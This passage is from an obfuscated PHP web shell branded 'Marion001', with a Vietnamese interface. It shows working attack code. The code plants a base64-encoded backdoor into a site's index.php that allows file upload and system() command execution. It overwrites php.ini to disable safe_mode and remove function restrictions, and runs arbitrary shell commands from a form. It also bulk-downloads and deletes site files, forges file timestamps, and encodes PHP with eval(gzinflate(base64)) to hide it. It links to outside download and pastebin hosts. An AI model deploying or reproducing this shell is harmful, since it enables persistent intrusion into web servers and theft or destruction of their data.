  506. o Shell CMD.php</a><br/><a href='Bypas-CMD/Command.php' target='_bank'>V&#224;
  507. o Shell Command.php</b></center></a><br/><iframe src=Bypas-CMD/Command.php width=99% height=700px frameborder=0></iframe>";
  508. exit();
  509. }if(isset($_GET["Marion001-Backdoor"])){${Marion001_Backdor}="Pz4KPD9waHAKaWYoJF9HRVRbJ01hcmlvbjAwMSddPT0ndXBsb2FkJyl7ZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBhY3Rpb249Ij9NYXJpb24wMDE9dXBsb2FkIj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZV91cGxvYWQiIHNpemU9IjIwIiBpZD0iZmlsZSI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iZ3VpIiB2YWx1ZT0iTWFyaW9uMDAxIiA+PC9mb3JtPic7CmlmIChpc3NldCgkX1BPU1RbJ2d1aSddKSl7bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ2ZpbGVfdXBsb2FkJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGVfdXBsb2FkJ11bJ25hbWUnXSk7ZWNobyAiPGgxPjxhIGhyZWY9JyRmdWxscGF0aCc+VCYjNzg0MztpIEZpbGUgTCYjMjM0O24gVGgmIzIyNDtuaCBDJiMyNDQ7bmcuPC9hPjwvaDE+Ijt9fQo/PjxwcmU+PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnTWFyaW9uMDAxJ10pPz48L3ByZT4=";
  510. ${pack}=$_SERVER["DOCUMENT_ROOT"];
  511. chdir("$pack");
  512. chmod("index.php",0755);
  513. ${file}=fopen("$pack"."/index.php","a")or die("G&#7855;
  514. n BackDoor Th&#7845;
  515. t B&#7841;
  516. i, Kh&#244;
  517. ng C&#243;
  518. Quy&#7873;
  519. n Ghi");
  520. ${write}=fwrite(${file},base64_decode(${Marion001_Backdor}));
  521. fclose(${"file"});
  522. chmod("index.php",0644);
  523. ${bypascmd}="php.ini";
  524. ${"dosya"}=fopen("$pack"."/php.ini","a")or die("Kh&#244;
  525. ng T&#7841;
  526. o &#272;
  527. &#432;
  528. &#7907;
  529. c php.ini");
  530. ${tuyen1}="c2FmZV9tb2RlICAgICAgICAgID0gICAgICAgT0ZGCgpkaXNhYmxlX2Z1bmN0aW9ucyAgICAgICA9ICAgICAgICAgICAgTk9ORQ==";
  531. fwrite(${dosya},base64_decode(${tuyen1}));
  532. fclose(${"dosya"});
  533. ${checkurl}=$_SERVER["HTTP_HOST"];
  534. ${backdoorupload}="$checkurl"."/index.php?Marion001=upload";
  535. ${backdoorcommand}="$checkurl"."/index.php?Marion001=ls";
  536. echo"<a href='http://$backdoorupload' target='_bank'>http://$backdoorupload<a/><br/>";
  537. echo"<a href='http://$backdoorcommand' target='_bank'>http://$backdoorcommand<a/>";
  538. exit();
  539. }if(isset($_GET["CommandFix-Marion001"])){${uploaddir}=dirname(__FILE__);
  540. echo"<center><form action=\"?CommandFix-Marion001" method="post" enctype=\"multipart/form-data" name=\"uploadercmd2" id=\"uploadercmd2\"><input type="file\" name="file\" size=\"50"><input name=\"_uplcmd2" type=\"submit\" id=\"_uplcmd2\" value="Upload\"></form></center>";
  541. if($_POST["_uplcmd2"]=="Upload"){if(@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"])){echo"<p align=\"center\">T&#7843;
  542. i L&#234;
  543. n Th&#224;
  544. nh C&#244;
  545. ng";
  546. echo"<center>Pack: $uploaddir/</center>";
  547. }else{echo"<p align=\"center"><b>T&#7843;
  548. i L&#234;
  549. n Th&#7845;
  550. t B&#7841;
  551. i</p>";
  552. }}@ini_set("output_buffering",0);
  553. @ini_set("display_errors",0);
  554. echo"<a style="color:#FFF500;
  555. " href="http://www.mediafire.com/download/ifqjv7gy3zr7xpk\" target=\"_blank\"><b>Download Bypass local: ./cat, ./ls, ./etc/passwd, v...v...</b></a>";
  556. echo"<form method="POST\"><input type="text" placeholder="Nh&#7853;
  557. p L&#7879;
  558. nh C&#7847;
  559. n Th&#7921;
  560. c Hi&#7879;
  561. n\" style="width:90%;
  562. margin:0;
  563. " name="cmdloai2\"><input type="submit\" value="Command\">";
  564. echo"<br/><b>Output:</b><textarea style="margin: 0px;
  565. width: 100%;
  566. height: 200px;
  567. ">";
  568. ${cmdloai2}=$_POST["cmdloai2"];
  569. system(${cmdloai2});
  570. echo"</textarea><br/><br/>";
  571. echo"<b>L&#7879;
  572. nh Shell C&#417;
  573. B&#7843;
  574. n Th&#432;
  575. &#7901;
  576. ng D&#249;
  577. ng Trong Lunix/Windows:</b><tr bgcolor="white"><td colspan=\"" height="5"><iframe width=\"100%\" height=\"260" src="http://pastebin.com/raw.php?i=ZeFmKRMp\" frameborder=\"0\"></iframe></td></tr><br/>";
  578. exit;
  579. }if(isset($_GET["StringHash"])){echo"<center><form action='' method='post'>String to hash: <input type='text' style='width:70%;
  580. margin:0;
  581. ' name='string'><input type='submit' name='generate_hashes_marion' value='Hash'></form></center><br/>";
  582. }if(isset($_POST["generate_hashes_marion"])){$rvcidmlhfrm="string";
  583. ${string}=$_POST["string"];
  584. ${md5}=md5(${string});
  585. ${md52}=md5(md5(${string}));
  586. ${md53}=md5(md5(md5(${$rvcidmlhfrm})));
  587. ${sha1}=sha1(${string});
  588. ${sha12}=sha1(sha1(${string}));
  589. ${sha13}=sha1(sha1(sha1(${string})));
  590. echo"<center><textarea cols='120' rows='7' readonly>";
  591. echo"md5(\$pass): ".${md5}."\n";
  592. echo"md5(md5(\$pass)): ".${md52}."\n";
  593. echo"md5(md5(md5(\$pass))): ".${md53}."\n";
  594. echo"sha1(\$pass): ".${sha1}."\n";
  595. echo"sha1(sha1(\$pass)): ".${"sha12"}."\n";
  596. echo"sha1(sha1(sha1(\$pass))): ".${sha13}."\n";
  597. echo"</textarea></center><br/>";
  598. exit;
  599. }if($_GET["php"]==Marion001){echo"<form action="" method=\"POST">";
  600. ${phpencodevd}="<?php echo "PHP Encode Marion001";
  601. ?>";
  602. echo"<textarea style='margin: 0px;
  603. width: 100%;
  604. height: 60;
  605. ' name='tuyen' placeholder='$phpencodevd' title='D&#225;
  606. n Code PHP C&#7847;
  607. n M&#195;
  608. H&#243;
  609. a V&#224;
  610. o &#272;
  611. &#226;
  612. y / To encrypt php code pasted here'></textarea><br/>";
  613. echo"<input type="submit" name=\"encode\" value=\"PHP Encode-Marion001\" title="M&#227;
  614. H&#243;
  615. a PHP">";
  616. echo"<br/><br/>";
  617. if(isset($_POST["encode"])){$xlrbijel="NoiDUng";
  618. ${Marion}=$_POST["tuyen"];
  619. ${encode}=base64_encode(${Marion});
  620. ${$xlrbijel}=base64_encode(gzdeflate(trim(stripslashes($_POST["tuyen"]." "),"<?php,?>"),9));
  621. ${encode}="<?php\n/*PHP Encode-Marion001*/\n\$Marion001 = '".${NoiDUng}."';
  622. \neval(gzinflate(base64_decode(\$Marion001)));
  623. \n?>";
  624. echo"<b>Encode:</b><textarea style='margin: 0px;
  625. width: 100%;
  626. height: 280;
  627. '>$encode</textarea>";
  628. exit();
  629. }}formhead(array("name"=>"goaction"));
  630. makehide("action");
  631. formfoot();
  632. ${errmsg}&&m(${"errmsg"});
  633. !${dir}&&${dir}=".";
  634. ${nowpath}=getPath(SA_ROOT,${dir});
  635. if(substr(${dir},-1)!="/"){$dbfzghrp="dir";
  636. ${dir}=${$dbfzghrp}."/";
  637. }${"uedir"}=ue(${dir});
  638. if(!${action}||${action}=="file"){$bcuftjo="doupfile";
  639. ${dir_writeable}=@is_writable(${nowpath})?"Writable":"Non-writable";
  640. if(${doing}=="deldir"&&${thefile}){if(!file_exists(${thefile})){$dmxcbjhqdg="thefile";
  641. m(${$dmxcbjhqdg}." Th&#432;
  642. M&#7909;
  643. c &#272;
  644. &#227;
  645. T&#7891;
  646. n T&#7841;
  647. i");
  648. }else{m("X&#243;
  649. a Th&#432;
  650. M&#7909;
  651. c ".(deltree(${thefile})?basename(${thefile})." Th&#224;
  652. nh C&#244;
  653. ng":"Th&#7845;
  654. t B&#7841;
  655. i"));
  656. }}elseif(${newdirname}){;
  657. ${mkdirs}=${nowpath}.${"newdirname"};
  658. if(file_exists(${"mkdirs"})){m("Th&#432;
  659. M&#7909;
  660. c &#272;
  661. &#227;
  662. T&#7891;
  663. n T&#7841;
  664. i");
  665. }else{$vfdrtmwetfb="mkdirs";
  666. m("T&#7841;
  667. o Th&#432;
  668. M&#7909;
  669. c ".(@mkdir(${$vfdrtmwetfb},0777)?"Th&#224;
  670. nh C&#244;
  671. ng":"Th&#7845;
  672. t B&#7841;
  673. i"));
  674. @chmod(${mkdirs},0777);
  675. }}elseif(${$bcuftjo}){m("T&#7843;
  676. i File L&#234;
  677. n ".(@copy($_FILES["uploadfile"]["tmp_name"],${uploaddir}."/".$_FILES["uploadfile"]["name"])?" Th&#224;
  678. nh C&#244;
  679. ng":" Th&#7845;
  680. t B&#7841;
  681. i"));
  682. }elseif(${editfilename}&&${filecontent}){$nqotlyyxsh="fp";
  683. ${$nqotlyyxsh}=@fopen(${editfilename},"w");
  684. m("L&#432;
  685. u File ".(@fwrite(${fp},${filecontent})?" Th&#224;
  686. nh C&#244;
  687. ng":" Th&#7845;
  688. t B&#7841;
  689. i"));
  690. @fclose(${fp});
  691. }elseif(${pfile}&&${newperm}){;
  692. if(!file_exists(${pfile})){m("C&#225;
  693. c T&#7879;
  694. p Tin G&#7889;
  695. c Kh&#244;
  696. ng T&#7891;
  697. n T&#7841;
  698. i");
  699. }else{${newperm}=base_convert(${newperm},8,10);
  700. m("S&#7917;
  701. a &#272;
  702. &#7893;
  703. i Thu&#7897;
  704. c T&#237;
  705. nh T&#7879;
  706. p Tin ".(@chmod(${pfile},${newperm})?"Th&#224;
  707. nh C&#244;
  708. ng":"Th&#7845;
  709. t B&#7841;
  710. i"));
  711. }}elseif(${oldname}&&${newfilename}){$haeqyby="nname";
  712. ${nname}=${"nowpath"}.${newfilename};
  713. if(file_exists(${$haeqyby})||!file_exists(${"oldname"})){m("L&#7895;
  714. i".${nname}." &#272;
  715. &#227;
  716. T&#7891;
  717. n T&#7841;
  718. i");
  719. }else{$ynscctf="oldname";
  720. m(basename(${"oldname"})." &#272;
  721. &#7893;
  722. i T&#234;
  723. n Th&#224;
  724. nh ".basename(${nname}).(@rename(${$ynscctf},${nname})?" Th&#224;
  725. nh C&#244;
  726. ng":"Th&#7845;
  727. t B&#7841;
  728. i"));
  729. }}elseif(${"sname"}&&${"tofile"}){if(file_exists(${tofile})||!file_exists(${sname})){m("C&#225;
  730. c T&#7879;
  731. p Tin Hay Th&#432;
  732. M&#7909;
  733. c &#272;
  734. &#227;
  735. T&#7891;
  736. n T&#7841;
  737. i");
  738. }else{$jmftqrnf="tofile";
  739. m(basename(${tofile})." &#272;
  740. &#432;
  741. &#7907;
  742. c Sao Ch&#233;
  743. p T&#7915;
  744. File ".(@copy(${"sname"},${$jmftqrnf})?basename(${"tofile"})." Th&#224;
  745. nh C&#244;
  746. ng":"Th&#7845;
  747. t B&#7841;
  748. i"));
  749. }}elseif(${curfile}&&${tarfile}){if(!@file_exists(${curfile})||!@file_exists(${tarfile})){m("C&#225;
  750. c T&#7879;
  751. p Tin Hay Th&#432;
  752. M&#7909;
  753. c &#272;
  754. &#227;
  755. T&#7891;
  756. n T&#7841;
  757. i");
  758. }else{$pdlnqiny="time";
  759. ${$pdlnqiny}=@filemtime(${tarfile});
  760. m("S&#7917;
  761. a &#272;
  762. &#7893;
  763. i TH&#7901;
  764. i Gian ".(@touch(${curfile},${time},${time})?"Th&#224;
  765. nh C&#244;
  766. ng":"Th&#7845;
  767. t B&#7841;
  768. i"));
  769. }}elseif(${curfile}&&${"year"}&&${month}&&${"day"}&&${"hour"}&&${minute}&&${second}){if(!@file_exists(${curfile})){;
  770. m(basename(${curfile})." Kh&#244;
  771. ng T&#7891;
  772. n T&#7841;
  773. i");
  774. }else{$hmyuvywgpm="time";
  775. ${time}=strtotime("$year-$month-$day $hour:$minute:$second");
  776. m("S&#7917;
  777. a &#272;
  778. &#7893;
  779. i Th&#7901;
  780. i Gian T&#7879;
  781. p Tin ".(@touch(${curfile},${time},${$hmyuvywgpm})?"Th&#224;
  782. nh C&#244;
  783. ng":"Th&#7845;
  784. t B&#7841;
  785. i"));
  786. }}elseif(${"doing"}=="downrar"){$zvvpcmwhc="dl";
  787. if(${$zvvpcmwhc}){${dfiles}="";
  788. foreach(${dl} as${filepath}=>${value}){${dfiles}.=${filepath}.",";
  789. }${dfiles}=substr(${dfiles},0,strlen(${"dfiles"})-1);
  790. ${dl}=explode(",",${dfiles});
  791. ${zip}=new PHPZip(${dl});
  792. ${code}=$zip->out;
  793. header("Content-type: application/octet-stream");
  794. header("Accept-Ranges: bytes");
  795. header("Accept-Length: ".strlen(${code}));
  796. header("Content-Disposition: attachment;
  797. filename=".$_SERVER["HTTP_HOST"]."-Marion001.tar.gz");
  798. echo${code};
  799. exit;
  800. }else{m("L&#7895;
  801. i, Vui L&#242;
  802. ng Ch&#7885;
  803. n File &#272;
  804. &#7875;
  805. T&#7843;
  806. i Xu&#7889;
  807. ng");
  808. }}elseif(${"doing"}=="delfiles"){$vstvwkg="dl";
  809. if(${$vstvwkg}){$dovrffxqo="succ";
  810. ${"dfiles"}="";
  811. ${$dovrffxqo}=${fail}=0;
  812. foreach(${"dl"} as${filepath}=>${value}){;
  813. if(@unlink(${filepath})){$vvfkbsinwbf="succ";
  814. ${$vvfkbsinwbf}++;
  815. }else{$usyirefgzgw="fail";
  816. ${$usyirefgzgw}++;
  817. }}m("&#272;
  818. &#227;
  819. X&#243;
  820. a Th&#224;
  821. nh C&#244;
  822. ng ".${succ}.", Th&#7845;
  823. t B&#7841;
  824. i ".${fail});
  825. }else{m("L&#7895;
  826. i, Vui L&#242;
  827. ng Ch&#7885;
  828. n File &#272;
  829. &#7875;
  830. X&#243;
  831. a");
  832. }}formhead(array("name"=>"createdir"));
  833. makehide("newdirname");
  834. makehide("dir",${nowpath});
  835. formfoot();
  836. formhead(array("name"=>"fileperm"));
  837. makehide("newperm");
  838. makehide("pfile");
  839. makehide("dir",${nowpath});
  840. formfoot();
  841. formhead(array("name"=>"copyfile"));
  842. makehide("sname");
  843. makehide("tofile");
  844. makehide("dir",${"nowpath"});
  845. formfoot();
  846. formhead(array("name"=>"rename"));
  847. makehide("oldname");
  848. makehide("newfilename");
  849. makehide("dir",${nowpath});
  850. formfoot();
  851. formhead(array("name"=>"fileopform"));
  852. makehide("action");
  853. makehide("opfile");
  854. makehide("dir");
  855. formfoot();
  856. ${free}=@disk_free_space(${nowpath});
  857. !${free}&&${"free"}=0;
  858. ${all}=@disk_total_space(${"nowpath"});
  859. !${all}&&${all}=0;
  860. ${used}=${all}-${free};
  861. ${used_percent}=@round(100/(${"all"}/${"free"}),2);
  862. p("<font color=SlateBlue2 face=tahoma size=2 title="File Manager Current disk free"><B>Dung L&#432;
  863. &#7907;
  864. ng C&#7911;
  865. a Host:</b> Dung L&#432;
  866. &#7907;
  867. ng &#272;
  868. &#227;
  869. D&#249;
  870. ng </font><font color=red><b>".sizecount(${free})."</font> Trong T&#7893;
  871. ng <font color=red>".sizecount(${"all"})."</font> (<font color=red>".${used_percent}."</font>%)<b/></font>");
  872. echo"<b> (T&#7843;
  873. i L&#234;
  874. n T&#7889;
  875. i &#272;
  876. a: ".@ini_get("upload_max_filesize")."</b>)";
  877. echo "<table width="100%" border=\"0\" cellpadding=\"0\" cellspacing=\"0" style="margin:10px 0;
  878. "><form action="" method=\"post" id=\"godir\" name=\"godir\"><tr>\n<td nowrap title="Th&#432;
  879. M&#7909;
  880. c Hi&#7879;
  881. n T&#7841;
  882. i">&#272;
  883. &#432;
  884. &#7901;
  885. ng D&#7851;
  886. n Hi&#7879;
  887. n T&#7841;
  888. i (";
  889. echo${dir_writeable};
  890. echo ", ";
  891. echo getChmod(${"nowpath"});
  892. echo ")</td>\n<td width="100%\"><input name="view_writable" value="0\" type="hidden\" /><input class=\"input\" name="dir\" value=\"";
  893. echo${nowpath};
  894. echo "\" type=\"text\" style=\"width:100%;
  895. margin:0 8px;
  896. \" title=\"&#272;
  897. &#432;
  898. &#7901;
  899. ng D&#7851;
  900. n/Path\"></td>\n<td nowrap><input class=\"bt\" value=\"Marion001\" type="submit" title="Th&#7921;
  901. c Hi&#7879;
  902. n/Executing\"></td></tr></form></table>\n<script type="text/javascript">function createdir(){var newdirname;
  903. newdirname = prompt('Ten Thu Muc:', '');
  904. \nif (!newdirname) return;
  905. \$('createdir').newdirname.value=newdirname;
  906. \$('createdir').submit();
  907. }function fileperm(pfile){var newperm;
  908. \nnewperm = prompt('Tep Tin Hien Tai: '+pfile+'\n Thuoc Tinh Moi: ', '');
  909. \nif (!newperm) return;
  910. \$('fileperm').newperm.value=newperm;
  911. \$('fileperm').pfile.value=pfile;
  912. \$('fileperm').submit();
  913. }function copyfile(sname){var tofile;
  914. \ntofile = prompt('Tep Tin Goc: '+sname+'\\n Ten File (fullpath):', '');
  915. \nif (!tofile) return;
  916. \$('copyfile').tofile.value=tofile;
  917. \$('copyfile').sname.value=sname;
  918. \$('copyfile').submit();
  919. }function rename(oldname){var newfilename;
  920. \nnewfilename = prompt('Ten Tap Tin Cu: '+oldname+'\\n Ten Moi:', '');
  921. \nif (!newfilename) return;
  922. \$('rename').newfilename.value=newfilename;
  923. \$('rename').oldname.value=oldname;
  924. \$('rename').submit();
  925. }function dofile(doing,thefile,m){if (m && !confirm(m)) {return;
  926. }\n\$('filelist').doing.value=doing;
  927. \nif (thefile){\$('filelist').thefile.value=thefile;
  928. }\$('filelist').submit();
  929. }function createfile(nowpath){var filename;
  930. filename = prompt('Ten File can tao:', '');
  931. \nif (!filename) return;
  932. opfile('editfile',nowpath + filename,nowpath);
  933. }function opfile(action,opfile,dir){\$('fileopform').action.value=action;
  934. \$('fileopform').opfile.value=opfile;
  935. \$('fileopform').dir.value=dir;
  936. \$('fileopform').submit();
  937. }function godir(dir,view_writable){ if (view_writable) {\$('godir').view_writable.value=1;
  938. }\$('godir').dir.value=dir;
  939. \$('godir').submit();
  940. }\n</script>";
  941. tbhead();
  942. p("<form action="".${self}."\" method="POST" enctype=\"multipart/form-data"><tr class=\"alt1\"><td colspan="7" style="padding:5px;
  943. \" title=\"Ch&#7913;
  944. c N&#259;
  945. ng/Function">");
  946. p("<div style=\"float:right;
  947. \"><input class=\"input" name="uploadfile" value=\"\" type=\"file" /> <input class="\" name=\"doupfile\" value="Marion001\" type="submit" title="T&#7843;
  948. i L&#234;
  949. n/Upload\" /><input name=\"uploaddir\" value="".${dir}."\" type="hidden\" /><input name="dir\" value=\"".${"dir"}."" type="hidden" /></div>");
  950. p("<a href="javascript:godir('".$_SERVER["DOCUMENT_ROOT"]."');
  951. " title="WebRoot\">L&#234;
  952. n &#272;
  953. &#7847;
  954. u</a>");
  955. if(${view_writable}){p(" | <a href="javascript:godir('".${nowpath}."');
  956. \" title=\"View All\">Hi&#7879;
  957. n T&#7845;
  958. t C&#7843;
  959. </a>");
  960. }else{p(" | <a href=\"javascript:godir('".${nowpath}."','1');
  961. " title="View Writable">Th&#432;
  962. M&#7909;
  963. c C&#243;
  964. Quy&#7873;
  965. n Ghi</a>");
  966. }p(" | <a href=\"javascript:createdir();
  967. \" title="Create Directory\">T&#7841;
  968. o Th&#432;
  969. M&#7909;
  970. c</a> | <a href="javascript:createfile('".${nowpath}."');
  971. " title=\"Create File\">T&#7841;
  972. o File</a>");
  973. if(IS_WIN&&IS_COM){$tnrjvdkt="obj";
  974. ${obj}=new COM("scripting.filesystemobject");
  975. ${"DriveTypeDB"}=array(0=>"Unknow",1=>"Removable",2=>"&#7892;
  976. &#272;
  977. &#297;
  978. a:",3=>"Network",4=>"CDRom",5=>"RAM Disk");
  979. if(${"obj"}&&is_object(${$tnrjvdkt})){foreach($obj->Drives as${drive}){if($drive->DriveType==2){p(" | <a href=\"javascript:godir('".$drive->Path."/');
  980. " title="K&#237;
  981. ch Th&#432;
  982. &#7899;
  983. c/Size: ".sizecount($drive->TotalSize)."&#13;
  984. Dung L&#432;
  985. &#7907;
  986. ng C&#242;
  987. n L&#7841;
  988. i/Free: ".sizecount($drive->FreeSpace)."&#13;
  989. Lo&#7841;
  990. i/Type: ".${DriveTypeDB}[$drive->DriveType]."">".${DriveTypeDB}[$drive->DriveType]."(".$drive->Path.")</a>");
  991. }else{$qqxwekkxik="DriveTypeDB";
  992. p(" | <a href=\"javascript:godir('".$drive->Path."/');
  993. " title=\"Type:".${$qqxwekkxik}[$drive->DriveType]."\">".${DriveTypeDB}[$drive->DriveType]."(".$drive->Path.")</a>");
  994. }}}}$ufbimyy="dir_i";
  995. p("</td></tr></form>");
  996. p("<tr class="head\" title="File name\"><td>&nbsp;
  997. </td><td>T&#234;
  998. n File/Th&#432;
  999. M&#7909;
  1000. c</td><td width=\"16%" title=\"Last modified">L&#7847;
  1001. n S&#7917;
  1002. a Cu&#7889;
  1003. i C&#249;
  1004. ng</td><td width="10%\" title="Size\">Kick Th&#432;
  1005. &#7899;
  1006. c</td><td width="20%\" title="Chmod/Perms\">Quy&#7873;
  1007. n Th&#7921;
  1008. c Thi</td><td width="22%" title=\"Action\">C&#224;
  1009. i &#272;
  1010. &#7863;
  1011. t</td></tr>");
  1012. ${"dirdata"}=array();
  1013. ${filedata}=array();
  1014. if(isset($_GET["ScanFile"])){${packcheckshell}=$_SERVER["DOCUMENT_ROOT"];
  1015. echo"<center><form method="post" action="\"><div style=\"border-style: solid;
  1016. border-width: 1px;
  1017. padding-left: 4px;
  1018. padding-right: 4px;
  1019. padding-top: 1px;
  1020. padding-bottom: 1px">";
  1021. echo"<br/><div>&#272;
  1022. &#432;
  1023. &#7901;
  1024. ng D&#7851;
  1025. n <input type='text' size=70 name='folder' value='$packcheckshell'/></div><br/><div>T&#7915;
  1026. Kh&#243;
  1027. a <input type='text' size=70 name='key' value='base64_decode'/></div><p><input type='submit' name='submit' value='Ti&#7871;
  1028. n H&#224;
  1029. nh'/></p></div></form></center>";
  1030. error_reporting(E_ALL);
  1031. ini_set("memory_limit","2000M");
  1032. ini_set("safe_mode","off");
  1033. ${safe_mode}=@ini_get("safe_mode");
  1034. if(!${safe_mode})set_time_limit(0);
  1035. if(@!isset($_POST["key"])){}else{$wkuxcnq="folder";
  1036. if($_POST["folder"])${folder}=$_POST["folder"];
  1037. else${$wkuxcnq}=$_SERVER["DOCUMENT_ROOT"];
  1038. define("Keyword",$_POST["key"]);
  1039. define("TAB","&nbsp;
  1040. &nbsp;
  1041. &nbsp;
  1042. &nbsp;
  1043. ");
  1044. define("IGNORE_EXTENSIONS","pdf swf xls");
  1045. define("MAX_SIZE",1024*1024*1024);
  1046. define("IGNORE_BEFORE",strtotime("2009-08-01"));
  1047. ${shellscan}=$_SERVER["PHP_SELF"];
  1048. function findexts($filename){$wkdqwkemom="exts";
  1049. ${filename}=strtolower(${filename});
  1050. ${exts}=split("[/\.]",${filename});
  1051. ${n}=count(${exts})-1;
  1052. ${$wkdqwkemom}=${"exts"}[${n}];
  1053. return strtolower(${exts});
  1054. }function check_dir($directory,$level){$xmrxnzgit="indent";
  1055. global$virus_detected,$all,$detect_errors_only,$detected_Keyword_in_test_script;
  1056. ${$xmrxnzgit}="";
  1057. for(${count}=0;
  1058. ${count}<${level};
  1059. ${count}++){;
  1060. ${indent}.=TAB;
  1061. }${level}++;
  1062. ${read_dir}=opendir(${directory});
  1063. while(${file}=readdir(${"read_dir"})){$rydhrulvip="virus_detected";
  1064. ${"filepath"}=${directory}."/".${file};
  1065. if(${detect_errors_only}&&${$rydhrulvip}){exit;
  1066. }if(is_dir(${filepath})){;
  1067. if((${file}<>".")&&(${file}<>"..")){check_dir(${filepath},${level});
  1068. }}else{if(is_file(${filepath})){;
  1069. if((is_readable(${filepath}))&&(!stristr(IGNORE_EXTENSIONS,findexts(${file})))){${"GLOBALS"}["gyhborkdp"]="filepath";
  1070. if((filesize(${filepath})<MAX_SIZE)&&(filemtime(${${"GLOBALS"}["gyhborkdp"]})>IGNORE_BEFORE)){$rdeucsc="directory";
  1071. ${fileentry}=${$rdeucsc}."/".${file}." - ".date("j F Y H:i",filemtime(${filepath}));
  1072. ${filestring}=file_get_contents(${filepath});
  1073. ${"found"}=stripos(${"filestring"},Keyword);
  1074. ${found}=stristr(${filestring},Keyword);
  1075. flush();
  1076. if(${found}==false){if((!${detect_errors_only})&&(!${"all"})){}}else{;
  1077. if(${file}=="?ScanFile"){$iriercdx="detected_Keyword_in_test_script";
  1078. ${$iriercdx}=true;
  1079. }else{${virus_detected}=true;
  1080. if(${detect_errors_only}){}else{echo(TAB."<b style="color:#F00\">".${fileentry}."</b> - <b style=\"color:#FFFFF0">&#272;
  1081. &#227;
  1082. Ph&#225;
  1083. t Hi&#7879;
  1084. n</b><br/>");
  1085. }}}${found}="";
  1086. }else{if((!${"detect_errors_only"})&&(!${all})){}};
  1087. }else{if((!${detect_errors_only})&&(!${all})){}};
  1088. }else{};
  1089. }}closedir(${"read_dir"});
  1090. }${virus_detected}=false;
  1091. ${all}=true;
  1092. ${detect_errors_only}=false;
  1093. ${detected_Keyword_in_test_script}=false;
  1094. if(isset($_GET["ScanFileall"])){${all}=false;
  1095. }if(isset($_GET["detect_errors_only"])){${detect_errors_only}=true;
  1096. }${tukhoascan}=Keyword;
  1097. ${boquacacfile}=IGNORE_EXTENSIONS;
  1098. ${maxsizescan}=MAX_SIZE;
  1099. echo"<div style=\"border-style: solid;
  1100. border-width: 1px;
  1101. padding-left: 4px;
  1102. padding-right: 4px;
  1103. padding-top: 1px;
  1104. padding-bottom: 1px\">";
  1105. echo"<center><h1>Truy Xu&#7845;
  1106. t T&#7915;
  1107. Kh&#243;
  1108. a '$tukhoascan' Trong h&#7879;
  1109. Th&#7889;
  1110. ng !</h1>B&#7887;
  1111. Qua C&#225;
  1112. c File : $boquacacfile | B&#7887;
  1113. Qua File V&#432;
  1114. &#7907;
  1115. t Qu&#225;
  1116.  : <font color=yellow>$maxsizescan bytes.</font></div></center><br/><br/>";
  1117. if(${all}){echo("<font color=yellow>Danh S&#225;
  1118. ch, &#272;
  1119. &#431;
  1120. &#7901;
  1121. ng D&#7851;
  1122. n File B&#7883;
  1123. Nhi&#7877;
  1124. m</font><br/>");
  1125. }check_dir(${folder},0);
  1126. if(${virus_detected}){echo("<br/><b style="color:#f00">T&#236;
  1127. m Ki&#7871;
  1128. m Th&#224;
  1129. nh C&#244;
  1130. ng!</b><br>&nbsp;
  1131. <br/>");
  1132. }}exit();
  1133. }if(${"view_writable"}){$cmqhoyzebut="dirdata";
  1134. ${$cmqhoyzebut}=GetList(${nowpath});
  1135. }else{$xfazhzjpve="file";
  1136. ${dirs}=@opendir(${dir});
  1137. while(${$xfazhzjpve}=@readdir(${dirs})){$jurdikxv="filepath";
  1138. ${$jurdikxv}=${nowpath}.${file};
  1139. if(@is_dir(${filepath})){;
  1140. ${dirdb}["filename"]=${file};
  1141. ${dirdb}["mtime"]=@date("Y-m-d H:i:s",filemtime(${filepath}));
  1142. ${dirdb}["dirchmod"]=getChmod(${"filepath"});
  1143. ${dirdb}["dirperm"]=getPerms(${filepath});
  1144. ${dirdb}["fileowner"]=getUser(${filepath});
  1145. ${dirdb}["dirlink"]=${"nowpath"};
  1146. ${dirdb}["server_link"]=${filepath};
  1147. ${dirdb}["client_link"]=ue(${filepath});
  1148. ${"dirdata"}[]=${"dirdb"};
  1149. }else{$amxaymo="filepath";
  1150. ${filedb}["filename"]=${file};
  1151. ${filedb}["size"]=sizecount(@filesize(${filepath}));
  1152. ${filedb}["mtime"]=@date("Y-m-d H:i:s",filemtime(${filepath}));
  1153. ${filedb}["filechmod"]=getChmod(${filepath});
  1154. ${filedb}["fileperm"]=getPerms(${filepath});
  1155. ${filedb}["fileowner"]=getUser(${$amxaymo});
  1156. ${filedb}["dirlink"]=${nowpath};
  1157. ${filedb}["server_link"]=${filepath};
  1158. ${"filedb"}["client_link"]=ue(${filepath});
  1159. ${filedata}[]=${"filedb"};
  1160. }}$kmrropoiwl="dirs";
  1161. unset(${dirdb});
  1162. unset(${filedb});
  1163. @closedir(${$kmrropoiwl});
  1164. }@sort(${dirdata});
  1165. @sort(${"filedata"});
  1166. ${$ufbimyy}="0";
  1167. foreach(${dirdata} as${"key"}=>${dirdb}){;
  1168. if(${thisbg=".."&&${dirdb}["filename"]!="."){;
  1169. ${thisbg}=bg();
  1170. p("<tr class=\"fout\" onmouseover=\"this.className='focus';
  1171. " onmouseout="this.className='fout';
  1172. ">");
  1173. p("<td width=\"2%\" nowrap><font face="wingdings" size=\"3\" title="Th&#432;
  1174. M&#7909;
  1175. c/Directory\">1</font></td>");
  1176. p("<td><a href="javascript:godir('".${dirdb}["server_link"]."');
  1177. \" title=\"Th&#432;
  1178. M&#7909;
  1179. c/Directory">".${dirdb}["filename"]."</a></td>");
  1180. p("<td nowrap>".${dirdb}["mtime"]."</td>");
  1181. p("<td nowrap>Marion001</td>");
  1182. p("<td nowrap>");
  1183. p("<a href=\"javascript:fileperm('".${dirdb}["server_link"]."');
  1184. \" title=\"Chmod\">".${dirdb}["dirchmod"]."</a> / ");
  1185. p("<a href="javascript:fileperm('".${dirdb}["server_link"]."');
  1186. " title="Quy&#7873;
  1187. n/Permissions">".${dirdb}["dirperm"]."</a>".${"dirdb"}["fileowner"]."</td>");
  1188. p("<td nowrap><a href=\"javascript:dofile('deldir','".${dirdb}["server_link"]."','B&#7841;
  1189. n Ch&#7855;
  1190. c CH&#7855;
  1191. n S&#7869;
  1192. X&#243;
